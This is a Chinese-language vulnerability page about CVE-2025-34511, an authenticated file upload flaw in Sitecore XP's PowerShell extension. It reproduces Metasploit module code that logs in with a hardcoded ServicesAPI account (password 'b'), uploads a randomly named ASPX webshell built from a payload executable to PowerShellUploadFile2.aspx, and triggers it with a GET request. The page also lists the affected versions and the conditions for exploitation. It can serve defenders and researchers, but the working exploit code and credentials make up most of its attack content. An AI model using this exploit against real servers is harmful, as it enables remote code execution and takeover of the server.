Sitecore XP认证后文件上传漏洞

漏洞概述

风险等级: 高
本地利用: 否
远程利用: 是
CVE编号: CVE-2025-34511
CWE编号: N/A

技术细节

该漏洞模块利用CVE-2025-34511，这是Sitecore XP平台PowerShell扩展中的一个文件上传漏洞。该模块还利用CVE-2025-34509（ServicesAPI账户的硬编码凭证）来获取初始访问权限。

漏洞检测

检测过程包括以下步骤：

使用硬编码凭证（用户名：ServicesAPI，密码：b）登录身份服务
获取提升权限的cookie
检测PowerShell扩展是否安装
验证Sitecore版本是否在易受攻击范围内（10.0.0至10.4版本）

利用过程

Webshell上传

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25


def upload_webshell
  @webshell = "#{Rex::Text.rand_text_alpha(15)}.aspx"
  @item_uri = Rex::Text.rand_text_alpha(8)
  exe = generate_payload_exe
  asp = Msf::Util::EXE.to_exe_aspx(exe)

  data_post = Rex::MIME::Message.new
  data_post.add_part(@item_uri, nil, nil, %(form-data; name="ItemUri"))
  data_post.add_part('en', nil, nil, %(form-data; name="LanguageName"))
  data_post.add_part('0', nil, nil, %(form-data; name="Overwrite"))
  data_post.add_part('0', nil, nil, %(form-data; name="Unpack"))
  data_post.add_part('en', nil, nil, %(form-data; name="Versioned"))
  data_post.add_part(asp, 'text/plain', nil, %(form-data; name="#{@item_uri}"; filename="#{@webshell}"))

  res = send_request_cgi({
    'method' => 'POST',
    'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', 'PowerShellUploadFile2.aspx'),
    'vars_get' => { 'hdl' => '1245516121' },
    'data' => data_post.to_s,
    'ctype' => "multipart/form-data; boundary=#{data_post.bound}"
  })

  return false unless res&.code == 200
  true
end

Webshell触发

1
2
3
4
5
6


def trigger_webshell
  send_request_cgi({
    'uri' => normalize_uri('sitecore%20modules', 'Shell', 'PowerShell', 'UploadFile', @item_uri, @webshell),
    'method' => 'GET'
  })
end

利用条件

平台：Windows
架构：x86, x64
默认端口：443（使用SSL）

影响版本

易受攻击的Sitecore版本范围：10.0.0 至 10.4

参考链接

模块信息

作者: Piotr Bazydlo（漏洞发现）, msutovsky-r7（模块创建）
披露日期: 2025-06-17
许可证: MSF_LICENSE

Sitecore XP认证后文件上传漏洞分析与利用

本文详细分析了Sitecore XP平台中的CVE-2025-34511认证后文件上传漏洞，包含Metasploit模块的完整代码实现、漏洞检测方法和利用过程，涉及硬编码凭证和Webshell上传技术。